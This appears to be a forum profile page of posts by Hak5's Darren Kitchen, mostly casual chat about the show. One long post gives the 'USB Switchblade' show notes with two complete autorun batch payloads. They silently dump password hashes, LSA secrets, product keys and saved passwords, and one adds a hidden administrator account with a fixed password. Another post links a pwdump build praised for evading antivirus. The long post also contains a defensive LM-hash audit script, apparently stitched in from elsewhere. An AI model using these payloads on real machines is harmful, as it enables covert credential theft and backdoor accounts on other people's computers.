
Darren Kitchen

Root Admin
  • Posts

    4,887
  • Joined

  • Days Won

    248

Everything posted by Darren Kitchen

  1. It wouldn't be hard to program in, but I rather like it the way it is since it's actually way more stealthy. As a systems administrator if I found that this happened on my network I could check traffic logs and possibly find the drop site that the cracker used.
  2. Amish's technique does not require a U3 drive. I've tested it and had it work just fine. I'm too exhausted right now to check. Amish: could you take a look and maybe explain your technique here? Thx, D
  3. I've actually wanted that once or twice but never bothered to write anything. I think the usb switchblade code could be hacked to work in reverse, sort of. At least it would allow for a way to do the copy operations invisibly. Not sure on initiating it, maybe a secret key combo.
  4. pwdump and its dependencies can be encrypted. I'll post links below to the programs. Standard Disclaimers Apply! http://www.brainkill.net/hack/pwdump.exe http://www.brainkill.net/hack/pwservice.exe http://www.brainkill.net/hack/LsaExt.dll ======================= I can verify that the latest version of Symantec Anti-Virus Corporate Edition with the latest updates does not detect this now. Score one for brainkill!
  5. From Hak5 episode 2x02, fourth segment: http://www.hak5.org/archives/138

    Show notes:
    Most Current: http://www.hak5.org/wiki/index.php?title=E...itchblade.22.29
    Wiki page: http://www.hak5.org/wiki/index.php?title=USB_Switchblade

    Show Notes 1.0 adapted from my CFH #437 notes:

    Instant USB Password Recovery Tool (The "USB Switchblade")

    *Further development for this project can be found on the Hak5 forums at http://www.hak5.org/forums/viewtopic.php?t=2361

    In this segment we'll overview a few of Microsoft Windows' security weaknesses and show how to build a custom USB key that will retrieve vital information from a target computer, necessary for auditing password strength. A major flaw in the way Windows stores password information is the use of the legacy LM, or LAN Manager, hash. While this hash is based on DES encryption, it is vulnerable to time-memory trade-off attacks due to its poor implementation. Our custom USB key uses new U3 technology to automatically and invisibly retrieve these weak hashes within seconds of being inserted into the target computer. From here the LM hashes can be tested against a set of rainbow tables using the popular rainbowcrack software and audited for password strength. We will also cover password best practices and prevention methods for this type of attack.

    While the above paragraph may sound daunting at first, I will break it down into human terms and explain how and why this works, and what you can do to keep more secure passwords.

    Overview of weaknesses in Windows password stores

    The weakness that we will be exploiting is the way in which Windows stores password information. Since Windows 95, passwords have been stored in what is known as the LM, or LAN Manager, hash. This hash is based on DES encryption, which is a reasonably secure hash function; however, the way in which Microsoft implemented it makes it easily attacked for a few reasons. First, the user's password is converted to all uppercase. Second, the password is padded or truncated to 14 bytes. Next, the password is split into two 7-byte halves and the values are used to create two DES keys with a constant ASCII string, resulting in two 8-byte values. Those two values are concatenated to form a 16-byte value, which is the LM hash. Basically, what that all means is that your password is converted to all uppercase, split into two hashes, and stored in a DES-encrypted hash. This makes the hash susceptible to brute force or, in our case, Time-Memory Trade-Off attacks, which we'll get into in a few moments.

    Overview of password auditing USB key

    The beauty of our custom password hash retrieving USB key comes from its unique use of U3 technology. U3 is a relatively new USB flash drive technology developed by U3 LLC in cooperation with SanDisk and M-Systems. More information about U3 can be found at the website http://www.u3.com. It basically uses a portion of the flash drive's memory as a virtual CD-ROM drive. This allows the Windows autorun feature to work properly, enabling us to run programs as soon as the drive is inserted into a computer. The autorun feature does not work properly on standard USB flash drives, so a U3 enabled USB flash drive is required to make this work. In this example we are using a U3 enabled SanDisk Cruzer Micro USB Flash Drive. This drive comes with U3 software enabling the use of applications like Skype directly from the flash drive. We will need to wipe out the U3 partition on this drive and replace it with our own payload. In this case we are using a payload developed by a Hak5 community member who goes by the name of MaxDamage. Max's payload contains a Visual Basic script and autorun.inf file which will be flashed onto the U3 CD-ROM partition. The autorun.inf file launches the Visual Basic script, which in turn invisibly runs the exploit located on the normal flash drive partition.

    To replace the existing U3 software on the U3 enabled SanDisk Cruzer Micro USB Flash Drive we will need two files: LPInstaller.exe and cruzer-autorun.iso. Both are hosted on the www.hak5.org website and are under further development on our forums and wiki. LPInstaller.exe is a piece of software developed by SanDisk for updating the U3 software on the flash drive. By default it will query a special website at SanDisk, download the latest U3 software, and flash the U3 partition on the USB flash drive. Since we want to install our own software, we simply need to place a file named cruzer-autorun.iso in the same directory as the LPInstaller.exe program and run it. This will replace the existing U3 software with the first part of our payload.

    The second part of Max's payload is the set of scripts located on the normal partition of the USB flash drive. These are located within the hidden folders WIP/CMD/ and include DLLs, Visual Basic scripts, and executables, all run from a batch file. The batch file, go.cmd, will be run invisibly upon drive insertion and run the various password hash recovery tools. The most important part of this toolkit is the PwDump tool, which will retrieve the LM hashes from the local computer and save them to a log file on the normal flash drive partition within the /Documents/logfiles directory, with a file name based on the computer name with a .log extension. This file is created by the go.cmd file invisibly upon insertion and contains the LM hashes, as well as many other pieces of information. Further clarification on installation procedures for the password hash retrieving USB key can be found on the hak5.org website.

    Overview of Time-Memory Trade-Off

    Time-Memory Trade-Off, or TMTO, in terms of password cracking is a procedure used to reduce the amount of computation time needed to test hashes, normally using a lookup table. The password cracking is done by comparing the password hash, in our case the LM hash, against a table of hashes and their known plaintext equivalents. The most popular tables for this type of password cracking are known as Rainbow Tables, used in conjunction with a tool called Rainbow Crack. A full explanation of Time-Memory Trade-Off and Rainbow Tables is out of the scope of this article, so I encourage you to read the following articles if interested:
    http://neworder.box.sk/newsread.php?newsid=13362
    http://www.antsight.com/zsl/rainbowcrack/
    http://en.wikipedia.org/wiki/Rainbow_table

    There are many online services for comparing LM hashes against lookup tables, such as www.plain-text.info, www.md5lookup.com, and www.rainbowcrack-online.com. However, in this example we will be using our own rainbow tables with the rainbow crack tool. One of the best places to obtain a set of rainbow tables is the website http://rainbowtables.shmoo.com/ operated by the Shmoo Group. We will also need the rainbow crack software available from http://www.antsight.com/zsl/rainbowcrack/

    Putting the tools to use

    Once you have gathered the necessary tools and created your own password hash retrieving USB key using a compatible U3 enabled USB Flash Drive, we can put it to use and audit our computer's password strength. The first step is to insert the USB flash drive into a Windows computer and wait a few seconds for it to be recognized. Once recognized, the payload should be run automatically and invisibly, creating a log file on the flash drive in the /documents/logfiles/ directory. From here our work is done and we can safely remove the USB flash drive. From this or another computer we can open the log file containing the LM hash and run it against our rainbow tables using the rainbow crack tool. To do so we will copy the LM hash of the user's password we wish to audit from the log file into a new file named pwfile.txt and move it to the directory where we store our rainbow tables and rainbow crack tool. The command to test the hash against the tables is "rcrack *.rt -f pwfile". The rainbow crack tool will then take a few minutes to run the LM hash against our rainbow tables and display the results. If we see the password in plaintext, we know that the password is weak and needs to be strengthened.

    Mitigation

    There are a few things that need to be explained about this method for password hash retrieval and cracking. First is that physical access is needed to the Windows computer which we will be testing. Second is that the computer is logged in with administrative access. And third is that no anti-virus that would detect the payload is running. In our tests Symantec Corporate Anti-Virus was able to detect the pwdump tool in the payload and prevent it from running. Many other anti-virus solutions may do the same.

    Now if we are successful in using this method to retrieve the LM hash, run it against our rainbow tables, and find a match, the next step is to strengthen the password. To do this we must understand the limitations of the LM hash. While the LM hash may be Windows' Achilles heel, it can easily be circumvented by two methods. First is to use a password of 15 characters or more, which is highly recommended. For further reading on long password best practices see the following websites on pass phrases:
    http://www.microsoft.com/technet/community...gmt/sm1104.mspx
    http://www.fourmilab.ch/javascrypt/pass_phrase.html

    It is also worth mentioning that LM hashes can be disabled entirely on a Windows 2000 or higher computer by making a simple change to the registry. For more information on preventing Windows from storing an LM hash see the following article in the Microsoft Knowledge Base: http://support.microsoft.com/kb/299656/

    As an added precaution we can also disable the Windows autorun feature. More information on that procedure can be found in this Microsoft Knowledge Base article: http://support.microsoft.com/kb/q155217

    For more information on any of these topics and the MaxDamage password hash retrieving payload visit the wiki at www.hak5.org/wiki/

    Related Links
    http://www.hak5.org
    http://www.u3.com
    http://neworder.box.sk/newsread.php?newsid=13362
    http://www.antsight.com/zsl/rainbowcrack/
    http://en.wikipedia.org/wiki/Rainbow_table
    http://www.microsoft.com/technet/community...gmt/sm1104.mspx
    http://www.fourmilab.ch/javascrypt/pass_phrase.html
    http://support.microsoft.com/kb/299656/
    http://support.microsoft.com/kb/q155217

    Credits: MaxDamage, Amish

    Thinking out loud

    Feel free to use the wiki for development. Possibly filed under Hak5 Labs or something. Could be a good place for the pandora hack and future projects.

    Requirements
    * physical access
    * USB port
    * autorun enabled
    * no anti-virus (might be able to fix this)
    * administrator privileges (might be able to automate system level escalation)

    MaxDamage's Solution

    1. Loader
    This replaces the U3 partition on the SanDisk Cruzer Micro with an invisible autorun loader
    http://www.hak5.org/releases/2x02/switchbl...D1.0-loader.rar

    2a. Payload 1.0
    This payload gathers IP information, enables admin shares, adds an admin account, dumps the SAM, product keys, URL history, and LSA secrets
    http://www.hak5.org/releases/2x02/switchbl...1.0-payload.rar

```batch
@echo off
@if not exist Documents md Documents >nul
@if not exist Documents\logfiles md Documents\logfiles >nul
@echo ==================================================[Passive query bit] > Documents\logfiles\%computername%_load.log 2>&1
@echo ==================================================[System info] >> Documents\logfiles\%computername%_load.log 2>&1
@echo Computer Name is: %computername% and the Logged on User Name Is: %username% The date and Time is: %date% %time% >> Documents\logfiles\%computername%_load.log 2>&1
@ipconfig /all >> Documents\logfiles\%computername%_load.log 2>&1
@echo ==================================================[END System info] >> Documents\logfiles\%computername%_load.log 2>&1
@echo ==================================================[Enabling Admin Shares] >> Documents\logfiles\%computername%_load.log 2>&1
@reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters /v @AutoSharewks /t reg_dword /d 1 /f >> Documents\logfiles\%computername%_load.log 2>&1
@echo ==================================================[END Enabling Admin Shares] >> Documents\logfiles\%computername%_load.log 2>&1
@echo ==================================================[Add an administrative User Account] >> Documents\logfiles\%computername%_load.log 2>&1
@net user /add SUPPORT_388945a1 inferno /fullname:"Microsoft Corporation Help Request" >> Documents\logfiles\%computername%_load.log 2>&1
@net localgroup Administrators SUPPORT_388945a1 /add >> Documents\logfiles\%computername%_load.log 2>&1
@echo MYUSER: SUPPORT_388945a1 Password: inferno >> Documents\logfiles\%computername%_load.log 2>&1
@reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v SUPPORT_388945a1 /t reg_dword /d 0 /f >> Documents\logfiles\%computername%_load.log 2>&1
@echo ==================================================[END Add User] >> Documents\logfiles\%computername%_load.log 2>&1
@echo ==================================================[Dump SAM] >> Documents\logfiles\%computername%_load.log 2>&1
@.\pwdump 127.0.0.1 >> Documents\logfiles\%computername%_load.log 2>&1
@echo ==================================================[Dump END SAM] >> Documents\logfiles\%computername%_load.log 2>&1
@echo ==================================================[Dump Product Keys] >> Documents\logfiles\%computername%_load.log 2>&1
@.\produkey /nosavereg /stext "Documents\logfiles\%computername%_zzz.txt" /remote %computername% >> Documents\logfiles\%computername%_load.log 2>&1
@copy Documents\logfiles\%computername%* Documents\logfiles\%computername%_load.log >> nul
@del /f /q "Documents\logfiles\%computername%_zzz.txt"
@echo ==================================================[Dump Product Keys END] >> Documents\logfiles\%computername%_load.log 2>&1
@echo ==================================================[Dump URL History] >> Documents\logfiles\%computername%_load.log 2>&1
@cscript //nologo .\DUH.vbs >> Documents\logfiles\%computername%_load.log 2>&1
@echo ==================================================[Dump URL History] >> Documents\logfiles\%computername%_load.log 2>&1
@echo ==================================================[Dump LSA Secrets] >> Documents\logfiles\%computername%_load.log 2>&1
@.\pspv.exe /stext "Documents\logfiles\%computername%_LSA.log" >> Documents\logfiles\%computername%_load.log 2>&1
@copy Documents\logfiles\%computername%* Documents\logfiles\%computername%_load.log >> nul
@del /f /q "Documents\logfiles\%computername%_LSA.log"
@echo ==================================================[Dump END LSA] >> Documents\logfiles\%computername%_load.log 2>&1
:End
@exit
```

    2b. Payload 1.1
    This payload gathers IP information, dumps SAM, product keys, LSA secrets, network passwords, messenger passwords, and URL history.
    http://www.hak5.org/releases/2x02/switchbl...1.1-payload.rar

```batch
@echo off
if not exist Documents md Documents >nul
if not exist Documents\logfiles md Documents\logfiles >nul
cd wip\cmd >nul
Echo ************************************ > Documents\logfiles\%computername%.log 2>&1
echo ***********[System info]************ >> Documents\logfiles\%computername%.log 2>&1
Echo ************************************ >> Documents\logfiles\%computername%.log 2>&1
echo Computer Name is: %computername% and the Logged on User Name Is: %username% The date and Time is: %date% %time% >> Documents\logfiles\%computername%.log 2>&1
ipconfig /all >> Documents\logfiles\%computername%.log 2>&1
Echo ************************************ >> Documents\logfiles\%computername%.log 2>&1
echo ***********[Dump SAM]*************** >> Documents\logfiles\%computername%.log 2>&1
Echo ************************************ >> Documents\logfiles\%computername%.log 2>&1
.\pwdump 127.0.0.1 >> Documents\logfiles\%computername%.log 2>&1
Echo ************************************ >> Documents\logfiles\%computername%.log 2>&1
echo ***********[Dump Product Keys]****** >> Documents\logfiles\%computername%.log 2>&1
Echo ************************************ >> Documents\logfiles\%computername%.log 2>&1
.\produkey /nosavereg /stext "Documents\logfiles\%computername%_pk.log" /remote %computername% >> Documents\logfiles\%computername%.log 2>&1
copy Documents\logfiles\%computername%.log+Documents\logfiles\%computername%_pk.log* Documents\logfiles\%computername%.log >> nul
del /f /q "Documents\logfiles\%computername%_pk.log" >nul
Echo ************************************ >> Documents\logfiles\%computername%.log 2>&1
echo ***********[Dump LSA secrets]******* >> Documents\logfiles\%computername%.log 2>&1
Echo ************************************ >> Documents\logfiles\%computername%.log 2>&1
.\pspv.exe /stext "Documents\logfiles\%computername%_LSA.log" >> Documents\logfiles\%computername%.log 2>&1
copy Documents\logfiles\%computername%.log+Documents\logfiles\%computername%_lsa.log* Documents\logfiles\%computername%.log >> nul
del /f /q "Documents\logfiles\%computername%_lsa.log" >nul
Echo ************************************ >> Documents\logfiles\%computername%.log 2>&1
echo ***********[Dump Network PW]******** >> Documents\logfiles\%computername%.log 2>&1
Echo ************************************ >> Documents\logfiles\%computername%.log 2>&1
.\netpass.exe /stext "Documents\logfiles\%computername%_np.log" >> Documents\logfiles\%computername%.log 2>&1
copy Documents\logfiles\%computername%.log+Documents\logfiles\%computername%_np.log* Documents\logfiles\%computername%.log >> nul
del /f /q "Documents\logfiles\%computername%_np.log" >nul
Echo ************************************ >> Documents\logfiles\%computername%.log 2>&1
echo ***********[Dump messenger PW]******** >> Documents\logfiles\%computername%.log 2>&1
Echo ************************************ >> Documents\logfiles\%computername%.log 2>&1
.\mspass.exe /stext "Documents\logfiles\%computername%_ms.log" >> Documents\logfiles\%computername%.log 2>&1
copy Documents\logfiles\%computername%.log+Documents\logfiles\%computername%_ms.log* Documents\logfiles\%computername%.log >> nul
del /f /q "Documents\logfiles\%computername%_ms.log" >nul
Echo ************************************ >> Documents\logfiles\%computername%.log 2>&1
echo ***********[Dump URL History]******* >> Documents\logfiles\%computername%.log 2>&1
Echo ************************************ >> Documents\logfiles\%computername%.log 2>&1
cscript //nologo .\DUH.vbs >> Documents\logfiles\%computername%.log 2>&1
:End
exit
```

    2c. Payload 1.2 (Pwdump update from BrainKill)
    http://www.hak5.org/releases/2x02/switchbl...1.2-payload.rar
    Updates either package with a version of Pwdump that is not detected by Symantec Anti-Virus.

    Amish's Solution

    Amish's solution is similar to MaxDamage's, however it does not require a U3 compatible USB drive. It relies on a little social engineering and gathers similar data. I'll let Amish explain it in more detail.
    http://www.hak5.org/releases/2x02/switchbl...1.0-payload.rar
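The show notes above explain the LM hash construction (uppercase, pad to 14 bytes, two independent 7-byte DES halves) and the two mitigations (15+ character passwords, or disabling LM storage per KB 299656). The script below is an added example written from the auditor's side; it is not part of the show notes or of MaxDamage's or Amish's payloads. It assumes the classic pwdump line layout `user:rid:lmhash:nthash:::` and relies on two well-known constants: `aad3b435b51404ee`, the LM half produced by an empty (fully padded) 7-byte block, and `31d6cfe0d16ae931b73c59d7e0c089c0`, the NT hash of an empty password. The sample dump is constructed; its non-constant hash values are made-up placeholders, not hashes of real passwords. Given a dump, it reports which accounts still store a crackable LM hash, which of those reveal a password of 7 characters or fewer (second half equal to the empty constant), and which have already been moved out of LM's reach.

```python
"""Audit pwdump-style output for LM hash exposure (added example)."""
from dataclasses import dataclass
from typing import Dict, Optional

# Well-known constant: DES("KGS!@#$%") under an all-zero 7-byte key, i.e. the
# LM hash half produced by an empty (fully padded) half of the password.
EMPTY_LM_HALF = "aad3b435b51404ee"
EMPTY_LM_HASH = EMPTY_LM_HALF * 2
# Well-known constant: the NT hash (MD4 of UTF-16LE) of the empty password.
EMPTY_NT_HASH = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed sample in pwdump format (user:rid:lmhash:nthash:::).  The
# non-constant hash values are made-up hex placeholders, not real hashes.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
alice:1001:fedcba9876543210aad3b435b51404ee:0123456789abcdef0123456789abcdef:::
bob:1002:fedcba98765432100123456789abcdef:0123456789abcdef0123456789abcdef:::
# comment lines and blank lines are ignored
"""


@dataclass
class Account:
    user: str
    rid: int
    lm_hash: str  # 32 lowercase hex characters
    nt_hash: str  # 32 lowercase hex characters


def parse_pwdump_line(line: str) -> Optional[Account]:
    """Parse one pwdump line; return None for blanks, comments or malformed lines."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    parts = line.split(":")
    if len(parts) < 4:
        return None
    user, rid, lm, nt = parts[0], parts[1], parts[2].lower(), parts[3].lower()
    if not rid.isdigit() or len(lm) != 32 or len(nt) != 32:
        return None
    try:
        int(lm, 16)
        int(nt, 16)
    except ValueError:
        return None
    return Account(user, int(rid), lm, nt)


def classify(acct: Account) -> str:
    """Describe what the stored hashes give someone who obtains the dump."""
    if acct.nt_hash == EMPTY_NT_HASH:
        return "blank-password"   # nothing to crack: the password is empty
    if acct.lm_hash == EMPTY_LM_HASH:
        return "no-lm"            # LM storage disabled, or password is 15+ chars
    if acct.lm_hash[16:] == EMPTY_LM_HALF:
        return "lm-short"         # password is 1-7 chars: only one DES half is real
    return "lm-full"              # 8-14 chars: two independent 7-char halves


REMEDIATION = {
    "blank-password": "set a password immediately",
    "lm-short": "disable LM storage (KB 299656) or use a 15+ character passphrase",
    "lm-full": "disable LM storage (KB 299656) or use a 15+ character passphrase",
    "no-lm": "ok: no LM hash stored, only the NT hash is exposed",
}


def audit(dump_text: str) -> Dict[str, str]:
    """Map each account name in a pwdump dump to its LM exposure class."""
    findings: Dict[str, str] = {}
    for line in dump_text.splitlines():
        acct = parse_pwdump_line(line)
        if acct is not None:
            findings[acct.user] = classify(acct)
    return findings


def lm_work_factor(alphabet_size: int = 69) -> int:
    """Worst-case DES operations to exhaust an LM hash by brute force.

    Because each 7-byte half is hashed independently, an attacker searches two
    7-character spaces rather than one 14-character space.  The default of 69
    is the number of printable ASCII characters left after case folding
    (95 printable minus the 26 lowercase letters that collapse into uppercase).
    """
    return 2 * alphabet_size ** 7


if __name__ == "__main__":
    for user, finding in audit(SAMPLE_DUMP).items():
        print(f"{user:15} {finding:15} {REMEDIATION[finding]}")
    print("LM brute-force worst case (two 7-char halves):", lm_work_factor())
    print("Equivalent single 14-char search space:      ", 69 ** 14)
```

Run against a real dump, the `no-lm` class is what you want every account to land in; `lm-short` and `lm-full` are the accounts the show's rainbow table step would recover. The work-factor function makes the "split into two halves" point concrete: the two-half search is a tiny fraction of the 14-character space it replaces.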
  6. There's not much in a name. Hak5 could have been called "kill-9" and as long as the content was the same people would be wearing "Kill-9" t-shirts instead of Hak5 t-shirts. My other advice isn't about names; rather, when it comes to online publications of any sort the golden rule, at least in my opinion, is "don't promise, produce". Good luck! D
  7. In Toronto over the weekend we stopped on the street when we saw a chopper with a helmet that read "FTW". We all laughed and I took a pic with my camera phone. Then the biker came around and we commented on the helmet. He looked at us and said "fuck the world baby". So yeah, I guess it depends on where you are between the geek <----> biker scale.
  8. I just need to make this very clear. That's not Wess' myspace profile. It's a fan made profile. And it should be clearly marked. Now I wish I remembered who created it. It needs to be altered so that people know it's a Wess fan page. Supposedly there's one for me floating around too. Whatever.
  9. The F@H group was mentioned in 2x02 so hopefully it'll get a nice influx of group members. :) hopefully. I think it's a wonderful cause.
  10. Darren Kitchen

    USB Cooking

    Nice find :) Can't wait to show Wess.
  11. First off I need to apologize for the late response on this matter. I just got back from our trip to Canada and hadn't been keeping up with the forums. I was not aware that Vertex-Hosting had started blocking Tor. I will have to speak to the administrator of that network and see what we can do about resolving this issue. Personally I think Tor, and Metasploit for that matter, are great tools when used responsibly. In the meantime, please try connecting to our alternate server at 66.252.7.115. It's a node on the same network. They're all round-robined. And I believe even the irc.techphile.ca network has merged with ours but I haven't verified that. I've been so busy with production that I haven't had time to administrate the ever growing Hak5 network so I've had to delegate some of those responsibilities. Again, I apologize for the late response and hope that you are able to reconnect to the IRC network soon. If you have any other problems please feel free to email me directly. Thanks, Darren
  12. It's often safe to move $hf_mig$, $NtServicePackUninstall$, and SoftwareDistribution to another partition. Win+F 'em ;)
  13. It's taken care of. Thanks to everyone who sent in. Picking the one to use was *really* tough. Ok, off to Canada in a few hours.
  14. I'm going to contact my buddy Matt. He can rap up a storm. Maybe he can do this up, it would be an awesome special on Hak5. :)
  15. It would be awesome if you would throw up the source Audacity (or whatever program you used) file and let others expand on it. I really like it but had a hard time hearing the lyrics; they need to be increased in volume by 100%.
  16. I am aware of the situation and working on a solution. Thanks
  17. Let's be honest... I think we all do. I guess I should clarify before you start thinking that we're freaks. I've got 4 autographed photos from when we sent some out to VaKo and Melodic.
  18. I've got a stockpile of pre-autographed photos.
  19. Ok, as you are probably aware my little accident with the sheet metal has cost us some very needed time in the production department. We leave for Toronto on Wednesday so the show needs to be done and set to render on Tuesday night. We lost a day of production and have no way to make it up. So I'm calling on the community to help with a fun part of the episode. We need some voice acting for a house ad. Specifically the tshirt ad. The script is: "9 out of 10 evil servers recommend hak5 trust your technolust tshirts. get yours today before they get you! (in soviet russia)"<fast talk> "tshirts available in small through 3 XL, some assembly required, portable moon base not included, jinx dot com and its partners are not affiliated with evil server. [pause] they have servers, they're just not evil. [pause] yet" </fast talk> The above should be about 20-30 seconds. We need an mp3 or wav sent to darren@hak5.org. The best sounding one wins the spot in the episode, your name in the credits, and we'll send you out an autographed postcard of the cast. Deadline is Tuesday by 5:00 pm EDT (-5 gmt). Bonus points for creative modifications to the script, and of course awesome accents.
  20. Saw the doc today. I go in for pre-surgery on the 5th, then the operation on the 12th. They'll be slicing my finger open through the same incision and repairing the torn tendon. I'm expected to fully recover in about 12 weeks.
  21. It happened while punching Wess. I missed. For once Paul let the camera roll. I haven't checked the footage but I bet it's bloody. I'm not sure if it will be suitable for 2x02.
  22. Cheers Tom!!! Can't wait to get a beer w/ ya in London!